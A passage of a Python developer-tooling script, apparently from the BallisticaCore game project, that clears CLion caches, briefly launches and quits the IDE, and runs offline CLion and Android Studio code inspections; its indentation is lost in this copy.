# At the moment offline clion inspections seem a bit flaky.
# They don't seem to run at all if we haven't opened the project
# in the GUI, and it seems recent changes can get ignored for that
# reason too.
# So for now let's try blowing away caches, launching the gui
# temporarily, and then kicking off inspections after that. Sigh.
print('Clearing CLion caches...', flush=True)
subprocess.run('rm -rf ~/Library/Caches/CLion*', shell=True, check=True)
# Note: I'm assuming this project needs to be open when the GUI
# comes up. Currently just have one project so can rely on auto-open
# but may need to get fancier later if that changes.
print('Launching GUI CLion to rebuild caches...', flush=True)
process = subprocess.Popen(str(clionbin))
# Wait a moment and ask it nicely to die.
waittime = 120
while waittime > 0:
print(f'Waiting for {waittime} more seconds.')
time.sleep(10)
waittime -= 10
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
subprocess.run("osascript -e 'tell application \"CLion\" to quit'",
shell=True,
check=False)
# process.terminate()
print('Waiting for GUI CLion to quit...', flush=True)
process.wait(timeout=60)
print('Launching Offline CLion to run inspections...', flush=True)
_run_idea_inspections_cached(
cachepath=cachepath,
filenames=filenames,
full=full,
projroot=Path(projroot, 'ballisticacore-cmake'),
inspectdir=Path(projroot, 'ballisticacore-cmake/src/ballistica'),
displayname='CLion',
inspect=inspect,
verbose=verbose)
def androidstudiocode(projroot: Path, full: bool, verbose: bool) -> None:
"""Run Android Studio inspections on all our code."""
# import time
cachepath = Path('config/.cache-androidstudiocode')
filenames = get_code_filenames(projroot)
clionroot = Path('/Applications/Android Studio.app')
# clionbin = Path(clionroot, 'Contents/MacOS/studio')
inspect = Path(clionroot, 'Contents/bin/inspect.sh')
# At the moment offline clion inspections seem a bit flaky.
# They don't seem to run at all if we haven't opened the project
# in the GUI, and it seems recent changes can get ignored for that
# reason too.
# So for now let's try blowing away caches, launching the gui
# temporarily, and then kicking off inspections after that. Sigh.
# print('Clearing Android Studio caches...', flush=True)
# subprocess.run('rm -rf ~/Library/Caches/AndroidStudio*',
# shell=True,
# check=True)
# Note: I'm assuming this project needs to be open when the GUI
# comes up. Currently just have one project so can rely on auto-open
# but may need to get fancier later if that changes.
# print('Launching GUI CLion to rebuild caches...', flush=True)
# process = subprocess.Popen(str(clionbin))
# Wait a moment and ask it nicely to die.
# time.sleep(120)
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
# subprocess.run(
# "osascript -e 'tell application \"Android Studio\" to quit'",
# shell=True)
# process.terminate()
# print('Waiting for GUI CLion to quit...', flush=True)
# process.wait(timeout=60)
print('Launching Offline Android Studio to run inspections...', flush=True)
_run_idea_inspections_cached(
cachepath=cachepath,
filenames=filenames,
full=full,
projroot=Path(projroot, 'ballisticacore-android'),
inspectdir=Path(
projroot,
'ballisticacore-android/BallisticaCore/src/main/cpp/src/ballistica'
),
# inspectdir=None,
displayname='Android Studio',
inspect=inspect,
verbose=verbose)